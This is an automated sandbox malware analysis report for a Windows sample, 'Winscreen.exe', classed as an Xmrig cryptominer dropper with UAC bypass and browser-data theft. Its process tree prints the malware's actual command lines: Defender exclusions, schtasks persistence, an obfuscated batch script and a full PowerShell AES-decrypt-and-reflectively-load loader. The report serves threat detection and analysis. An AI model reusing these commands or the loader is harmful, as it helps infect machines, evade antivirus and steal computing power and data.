Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Winscreen.exe

Overview

General Information

Sample name:Winscreen.exe
Analysis ID:1526464
MD5:05b30a117a6915c4591c65449e83f0a4
SHA1:ea4f64edd2c1779966b5d0eecba6d7d9ba8a01c9
SHA256:d66ce2f63139ffdc5a9eeff9ca44b17f82a36a3f8713f959e59997e850ccdbbf
Tags:exeuser-imperialwool
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell decode and execute
Yara detected UAC Bypass using CMSTP
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Creates an undocumented autostart registry key
Creates autorun.inf (USB autostart)
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Enables a proxy for the internet explorer
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sets a proxy for the internet explorer
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the driver directory
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Userinit Child Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • Winscreen.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\Winscreen.exe" MD5: 05B30A117A6915C4591C65449E83F0A4)
    • powershell.exe (PID: 3624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2380 cmdline: "C:\Windows\System32\schtasks.exe" /Create /F /TN "explorer" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\explorer.exe" /RL HIGHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Roaming\explorer.exe" MD5: 753F5F61C1F444BB1524A26C0DF29F38)
      • cmstp.exe (PID: 1488 cmdline: "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\xtm5g4p2.inf MD5: 4CC43FE4D397FF79FA69F397E016DF52)
    • schtasks.exe (PID: 1412 cmdline: "C:\Windows\System32\schtasks.exe" /Create /F /TN "upx" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\upx.exe" /RL HIGHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • upx.exe (PID: 5588 cmdline: "C:\Users\user\AppData\Roaming\upx.exe" MD5: 78CC94F417D1BE1A25ACE9F52D52E23D)
    • powershell.exe (PID: 1848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\taskmoder.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3536 cmdline: "C:\Windows\System32\schtasks.exe" /Create /F /TN "taskmoder" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\taskmoder.exe" /RL HIGHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskmoder.exe (PID: 6756 cmdline: "C:\Users\user\AppData\Roaming\taskmoder.exe" MD5: 2A48F51475C2EB426B304DDDCF3F85F5)
      • cmd.exe (PID: 4284 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "taskmoder.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 5804 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
      • cmd.exe (PID: 3596 cmdline: "C:\Windows\System32\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2448 cmdline: "cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wscript.exe (PID: 6948 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • taskkill.exe (PID: 6832 cmdline: "C:\Windows\System32\taskkill.exe" /f /im smartscreen.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 3784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • userinit.exe (PID: 736 cmdline: "C:\Windows\System32\userinit.exe" MD5: 24892AC6E39679E3BD3B0154DE97C53A)
            • explorer.exe (PID: 1788 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • wscript.exe (PID: 5456 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
      • wscript.exe (PID: 348 cmdline: "C:\Windows\System32\wscript.exe" "C:\ProgramData\izjuqhimv.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 5748 cmdline: "C:\Windows\System32\cmd.exe" /c @echo off Set a1zr=YNB0FrMP4GIJbxjaqUsk6Cc5ERiHfyAhvwD31pOL7WdnQSKtu8goe2lTX9ZmzV cls @%a1zr:~52,1%%a1zr:~22,1%%a1zr:~31,1%%a1zr:~51,1% %a1zr:~51,1%%a1zr:~28,1%%a1zr:~28,1% %a1zr:~18,1%%a1zr:~52,1%%a1zr:~47,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~22,1%%a1zr:~15,1%%a1zr:~54,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~45,1%%a1zr:~31,1%%a1zr:~52,1%%a1zr:~54,1%%a1zr:~54,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~52,1%%a1zr:~13,1%%a1zr:~37,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~5,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%" /%a1zr:~28,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~17,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~18,1%%a1zr:~29,1%%a1zr:~18,1%%a1zr:~47,1%%a1zr:~52,1%%a1zr:~59,1%%a1zr:~35,1%%a1zr:~53,1%\%a1zr:~48,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%" /%a1zr:~28,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~0,1%%a1zr:~45,1%%a1zr:~55,1%%a1zr:~24,1%%a1zr:~6,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~21,1%%a1zr:~51,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~54,1%%a1zr:~45,1%%a1zr:~52,1%%a1zr:~47,1%\%a1zr:~21,1%%a1zr:~51,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~54,1%\%a1zr:~45,1%%a1zr:~52,1%%a1zr:~18,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1% %a1zr:~6,1%%a1zr:~15,1%%a1zr:~43,1%%a1zr:~15,1%%a1zr:~50,1%%a1zr:~52,1%%a1zr:~5,1%\%a1zr:~24,1%%a1zr:~43,1%%a1zr:~32,1%%a1zr:~26,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~43,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%" /%a1zr:~32,1% %a1zr:~21,1%%a1zr:~51,1%%a1zr:~59,1%%a1zr:~45,1%%a1zr:~37,1%%a1zr:~52,1%%a1zr:~22,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "" /%a1zr:~28,1% %a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~19,1%%a1zr:~26,1%%a1zr:~54,1%%a1zr:~54,1% /%a1zr:~28,1% /%a1zr:~26,1%%a1zr:~59,1% %a1zr:~18,1%%a1zr:~59,1%%a1zr:~15,1%%a1zr:~5,1%%a1zr:~47,1%%a1zr:~18,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1% %a1zr:~18,1%%a1zr:~47,1%%a1zr:~15,1%%a1zr:~5,1%%a1zr:~47,1% %a1zr:~21,1%:\%a1zr:~7,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~5,1%%a1zr:~15,1%%a1zr:~59,1%%a1zr:~34,1%%a1zr:~15,1%%a1zr:~47,1%%a1zr:~15,1%\%a1zr:~33,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%.%a1zr:~32,1%%a1zr:~12,1%%a1zr:~18,1% MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5768 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Windows\winsin.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskmen.exe (PID: 6336 cmdline: "C:\Users\user\AppData\Local\Temp\taskmen.exe" MD5: EFA5846830C8A002235AC1768295C1B9)
      • Client.exe (PID: 5900 cmdline: "C:\Windows\Client.exe" MD5: 0CA491B3E2BBE82AA76F5BB94E8F2143)
        • Client (1).vmp.exe (PID: 5896 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe" MD5: A4E804239AE09E3A23A4020C226B188C)
        • Client (1).vmp.exe (PID: 1576 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe" MD5: A4E804239AE09E3A23A4020C226B188C)
      • cmd.exe (PID: 6368 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Windows\fail.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5544 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bsr0ba9vyRObkmxsgk+/KMsTtEAihtJSkhdfy6hSUIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSb4Zwde0fSbMLarzeaYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KSZHY=New-Object System.IO.MemoryStream(,$param_var); $WxRgU=New-Object System.IO.MemoryStream; $CTAHr=New-Object System.IO.Compression.GZipStream($KSZHY, [IO.Compression.CompressionMode]::Decompress); $CTAHr.CopyTo($WxRgU); $CTAHr.Dispose(); $KSZHY.Dispose(); $WxRgU.Dispose(); $WxRgU.ToArray();}function execute_function($param_var,$param2_var){ $aTurZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxyRp=$aTurZ.EntryPoint; $kxyRp.Invoke($null, $param2_var);}$iIPOn = 'C:\Windows\fail.bat';$host.UI.RawUI.WindowTitle = $iIPOn;$JhMMH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($iIPOn).Split([Environment]::NewLine);foreach ($ELdqw in $JhMMH) { if ($ELdqw.StartsWith('nZYsDSkVsFscZBoRZGdc')) { $wHkKi=$ELdqw.Substring(20); break; }}$payloads_var=[string[]]$wHkKi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 6676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • explorer.exe (PID: 6128 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: 753F5F61C1F444BB1524A26C0DF29F38)
    • cmstp.exe (PID: 4088 cmdline: "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\05mor1jc.inf MD5: 4CC43FE4D397FF79FA69F397E016DF52)
  • cmd.exe (PID: 5420 cmdline: cmd /c start C:\Windows\temp\ydztkyrb.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ydztkyrb.exe (PID: 5572 cmdline: C:\Windows\temp\ydztkyrb.exe MD5: D11D4C3E52A34767568FA7AEAB4200A7)
  • upx.exe (PID: 5988 cmdline: C:\Users\user\AppData\Roaming\upx.exe MD5: 78CC94F417D1BE1A25ACE9F52D52E23D)
  • taskkill.exe (PID: 5628 cmdline: taskkill /IM cmstp.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3652 cmdline: cmd /c start C:\Windows\temp\swtpd1aw.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • swtpd1aw.exe (PID: 2164 cmdline: C:\Windows\temp\swtpd1aw.exe MD5: D11D4C3E52A34767568FA7AEAB4200A7)
  • taskkill.exe (PID: 7064 cmdline: taskkill /IM cmstp.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • taskmoder.exe (PID: 940 cmdline: C:\Users\user\AppData\Roaming\taskmoder.exe MD5: 2A48F51475C2EB426B304DDDCF3F85F5)
  • Client (1).vmp.exe (PID: 3792 cmdline: "C:\Users\user\AppData\Roaming\Client (1).vmp.exe" MD5: A4E804239AE09E3A23A4020C226B188C)
  • Client (1).vmp.exe (PID: 4980 cmdline: "C:\Users\user\AppData\Roaming\Client (1).vmp.exe" MD5: A4E804239AE09E3A23A4020C226B188C)
  • taskmoder.exe (PID: 6204 cmdline: "C:\Users\user\AppData\Roaming\taskmoder.exe" MD5: 2A48F51475C2EB426B304DDDCF3F85F5)
  • taskmoder.exe (PID: 5420 cmdline: "C:\Users\user\AppData\Roaming\taskmoder.exe" MD5: 2A48F51475C2EB426B304DDDCF3F85F5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
\Device\ConDrvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
    C:\Windows\Temp\xtm5g4p2.infJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      C:\Windows\Temp\05mor1jc.infJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        C:\Users\user\AppData\Roaming\taskmoder.exeJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000016.00000003.2180849351.0000021D30380000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            0000000D.00000003.2134081504.000001411E6C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              00000007.00000002.2155649475.0000000002631000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0000000D.00000003.2134203640.000001411E6C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  00000016.00000003.2179819804.0000021D30380000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 19 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    31.0.taskmoder.exe.4d0000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi32_6676.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Files With System Process Name In Unsuspected Locations
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Winscreen.exe, ProcessId: 6564, TargetFilename: C:\Users\user\AppData\Roaming\explorer.exe
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Winscreen.exe", ParentImage: C:\Users\user\Desktop\Winscreen.exe, ParentProcessId: 6564, ParentProcessName: Winscreen.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe', ProcessId: 3624, ProcessName: powershell.exe
                        Sigma detected: System File Execution Location Anomaly
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\explorer.exe" , CommandLine: "C:\Users\user\AppData\Roaming\explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\explorer.exe, NewProcessName: C:\Users\user\AppData\Roaming\explorer.exe, OriginalFileName: C:\Users\user\AppData\Roaming\explorer.exe, ParentCommandLine: "C:\Users\user\Desktop\Winscreen.exe", ParentImage: C:\Users\user\Desktop\Winscreen.exe, ParentProcessId: 6564, ParentProcessName: Winscreen.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\explorer.exe" , ProcessId: 1436, ProcessName: explorer.exe
                        Sigma detected: WScript or CScript Dropper
